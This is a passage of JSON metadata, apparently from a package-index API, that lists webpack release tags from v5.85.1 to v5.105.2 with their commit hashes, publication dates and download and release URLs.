ck/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos